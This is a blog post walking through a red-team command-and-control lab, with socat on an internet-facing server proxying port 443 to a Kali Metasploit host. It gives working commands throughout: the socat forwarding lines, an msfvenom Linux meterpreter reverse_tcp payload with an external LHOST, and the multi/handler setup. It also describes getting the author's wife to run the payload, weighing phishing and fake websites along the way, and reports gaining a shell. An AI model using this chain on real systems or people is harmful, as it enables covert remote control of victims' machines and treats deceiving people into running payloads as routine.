First steps in setting up C2 environment. Using socat as front to metsaploit. Command and Control my way. @c2_matrix @metasploit #pentest #pentesting #redteam #infosec

Hi, I know that is been a while since the last post, but life got in the way. But it is time now.

My goal in these coming post is to setup different Command and Control systems and try them out.

Information about different C2 can be found on this fantastic site https://www.thec2matrix.com/

So as always we start with a picture that we can talk about

Command and Control setup

As you can see in the above picture my plan here is to use Socat as proxy for different C2 systems. I hope can get all above working. I will do several post on this for every C2 system that I will test.

So for this first post we will start with socat server and C2-1 server.

Short story first

  1. Get IP for external access from your best friend (Thomas) that handles network/firewall at work 🙂
  2. Install Socat server
  3. Install C2-1 server
  4. Configure Metasploit
  5. Create payload and run it on your wife’s computer
  6. Take over your wife’s computer

Install Socat server

We start easy with installation of ubuntu or any other linux dist at your own choosing. I used Ubuntu 20.10. Then I installed socat with the following command

sudo apt-get install socat

Then we can try out socat with this.

sudo socat TCP4-LISTEN:443,fork TCP4:invid.se:443

socat

What we do with above command is that we use this server as a socat proxy for my company website. I know that we use https and we will get a ssl certifcate warning but this is to make a point that the socat is working. Try now to surf to socat server ip external or internal you will end up on the site or ip that you define as the last one in the command.

If you want you want to forward more than one port this is also possible with below command

sudo socat TCP4-LISTEN:443,fork TCP4:invid.se:443 | sudo socat TCP4-LISTEN:80,fork TCP4:invid.se:80

socat with multiple ports

Now that we have a simple socat server up and running and we have tried the function is is time to move on to the C2 server.

Install C2-1 server

The first C2 server that we will install is Kali machine. In my case a vm. I download the latest version from https://cdimage.kali.org/kali-images/kali-weekly/ install standard installation.

When you have the machine up and running we start with setting up metasploit with below commands

sudo msfdb init
msfdb start
msfconsole -q or without -q

msfconle

We have now installed a kali machine and configured metasploit on the machine.

Now it is time to try this simple C2 server with a payload that I email my wife!

First of we start with socat. We bind port 443 on the socat server and the forward it to the C2-1 server on port 443.

sudo socat TCP4-LISTEN:443,fork TCP4:172.21.21.38:443

socat to c2-1

Socat server is accessible from internet if I access that external IP with port 443 it will forward this to C2-1 server. Any other port will be dropped.

Now that we have connected socat with the C2-1 server it is time to create a payload. We use msfvenom for this. Because we have C2-1 server installed and this is kali we have msfvenom installed sp I used this machine to create the payload

LHOST=your external ip on the socat server (your ip not mine)
LPORT=your port that the socat will forward to your C2-1 server (443)

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=191.242.411.17 LPORT=443 -f elf > 1.elf

We have now a executable file for a linux machine that we want to take over.

It is time to set up our C2 server, in this case metasploit

If you have not loaded metsaploit do it now.

Then we run some command to load the C2 server for us. LPORT is 443 and the LHOST is the local ip on the C2-1 server

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LPORT 443

set LHOST 172.21.21.38
exploit

metaploit running

So now we have finally set up the environment accessing this C2 with the payload that we created.

We have now the big issue left, how do I get my wife to run this file?
Fishing?
Fake website?
or just tell here to run this?

I did go for the last one in this case.

Run the command please….

After she run it I get this on the C2-1 server

We have the machine in our hands now!

We also have shell!

We have now tried the first C2 installation and that was metasploit with socat.

Now we move the the next part 2

Keep hacking!

//Roger

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.